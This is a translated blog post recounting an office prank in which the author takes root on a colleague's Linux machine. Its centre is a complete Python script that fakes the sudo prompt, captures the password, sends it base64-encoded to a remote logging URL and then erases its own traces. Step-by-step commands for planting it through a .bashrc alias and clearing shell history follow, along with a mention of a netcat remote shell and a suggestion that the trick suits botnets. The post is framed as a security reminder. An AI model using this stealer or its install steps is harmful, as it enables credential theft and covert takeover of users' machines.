Linux - the story of one hack

Hello World!
Today I would like to share with you one instructive story about how I once managed to get root access to a colleague’s working computer and how terribly simple it was to do it.

Background

The working day passed as usual with any average developer: monitor, keyboard, tea, cookies ... In general, nothing outstanding was expected, as always. Tired of the long debugging of the application in Xdebug, I decided to leave the office and breathe some fresh air in order to at least slightly bring my head (by that time already “pig-iron”) in order.

Returning to the workplace, I did not have time to get to work, when suddenly from the next table came the malicious voice of a colleague:

- Listen, it looks like your browser process ID is XXXX, right?

By running ps -A | grep opera, I saw that pid is really the one that the colleague was talking about.

- So what? - I answered in a calm voice.
“Nothing,” said a colleague and pressed “Enter” on the keyboard of his computer. My browser window closed before my eyes.

I immediately began to look for processes in the system that could give the remote shell. It was not SSH.
A colleague hinted that it was nc (netcat), the process of which, of course, was immediately killed.
We both laughed, discussed this funny case, it turned out that in fact there was no hacking and that “nc” was launched from under my user at that moment while I was not at my workplace. Just for lulz.
The joke in general was a success, but subconsciously I decided that it wasn’t so easy to leave this business, it was a challenge!

Pulp

Once, during the icy winter season, just before the New Year, I decided that it was time to take revenge. But this time I wanted to completely seize access to the computer - get root.

New Year's preparations in the office created a hefty fuss and noise. This was the most opportune moment, since a colleague after the incident began to block the screen when he moved away from the workplace. I knew that today is precisely the day when the likelihood that he will forget to make a lock is as high as possible.

Using a small “window” in my working time, I began to think over a plan of action for hacking. The main problem that had to be somehow solved was, of course, directly obtaining a root account, since everything else is just a matter of technology. An active search of ideas on how to do this at all began.

A colleague had Linux Mint 14 “Nadia”. The kernel version is 3.5. Although the kernel is not so old, the probability of quickly finding a working local exploit in free access is close to zero. Of the services, except Apache, it really did not cost anything, and he closed Apache for external access.

Throwing away idea after idea, it dawned on me in the end! But what if you try the simplest and most commonplace bash alias?
Having decided to check my assumption, I launch the terminal (Debian Squeeze), create a test.py file with the banal print “Hello, world!”, Save it in the home directory, execute the command:

alias sudo="$HOME/temp.py"

after that I type:

sudo mc

result:

Hello, world!

Here it is! Absolutely legal "hole" in security. Trite, but effective.

And now the script!

#!/usr/bin/env python
# Т.к. нам нужно поменьше символов в скрипте, поступаемся священным PEP
# и фигачим весь импорт в одну строку (да простит меня Гвидо!)
import os, sys, time, subprocess, getpass, urllib, base64
url = 'http://example.com/log.php?data=%s'
user = getpass.getuser()
# Имитируем запрос пароля sudo
passwd = getpass.getpass("[sudo] password for %s: " % user)
msg = user + ':' + passwd
home = os.path.expanduser('~')
script = sys.argv[0]
# На всякий случай сохраняем пароль в файл
with open(os.path.join(home, ".xsession-name"), "a+") as f:
    f.write(msg + "\n")
# Самое вкусное - отсылаем пароль на наш gateway
urllib.urlopen(url % base64.b64encode(msg))
# Действуем незаметно как ниндзя - стираем строку об алиасе из bashrc
with open(os.path.join(home, '.bashrc'), 'r+') as f:
    lines = f.readlines()[:-1]
    f.seek(0)
    f.writelines(lines)
    f.truncate()
# Имитируем задержку при неправильно введенном пароле
time.sleep(2)
print "Sorry, try again"
# Вуаля! А теперь вызываем настоящий sudo
subprocess.call(['sudo'] + sys.argv[1:])
# Т.к. мы всё еще ниндзя, самоуничтожаемся и стираем этот скрипт с диска
os.system('pkill python & rm %s' % script)

In short: the script simulates a sudo password request, intercepts the password and sends it to the specified server, where the information is simply written to a file.

Taking advantage of the temporary absence of a colleague in the workplace, I moved to his computer and began my “special operation”:

1. Create a permanent alias in bashrc:

echo 'alias sudo="'$HOME'/.xsession-lock"' >> $HOME/.bashrc

2. Create a file with the tricky name .xsession-lock, so that it is not striking when listing / home / user, and save our Python script into it.
3. Set the rights to execute .xsession-lock - chmod + x
4. Clean bash_history!

First of all, after his return, a colleague, waiting for a trick, carefully examined bash_history, and without noticing anything, began to work.
After some time, I decided to check the log file on a remote server that saved passwords, and here it is, the fish account of my dreams - root!
Of course, to be precise, this is actually a password from a working user of a colleague who gave me the opportunity to get root and gain a foothold in the system.

Later, I again waited for a colleague to leave the office and “conjured” it as root over his computer, but, unfortunately, he incorrectly calculated the time and got pierced! Alas, I got caught red-handed right at the scene of the "crime."

We laughed again, discussed the details of the “hack”, and then, together and cheerfully celebrated the New Year with the whole office.
Here is such a New Year’s story.

Conclusion

In light of the fact that Valve released steam under linux, there was a likelihood of an outflow of “hamsters” towards Linux systems and, at the same time, the likelihood that the gentlemen of the “black hat” would turn their eyes on Linux.

Therefore, I would like this article to become another reminder that "the salvation of drowning people is the work of the drowning people themselves."
When installing Linux, do not think about what you put on the diapers. The responsibility for the security of your information still lies with you!

PS The method described above may well be used in an automated form, for example, when creating botnets. According to this principle, it is quite possible to create a bootloader that will lie and dutifully wait for the user to enter a password, be it sudo or gksudo, and after that it will turn the computer into a “zombie machine”.
In addition, popular distributions come with such default settings that allow you to crank up the method from this article.
I hope that soon in the world of security * nix systems, nothing will change and some Lin'lockers and other nonsense will begin to appear.

PPS Hello Yanovsky !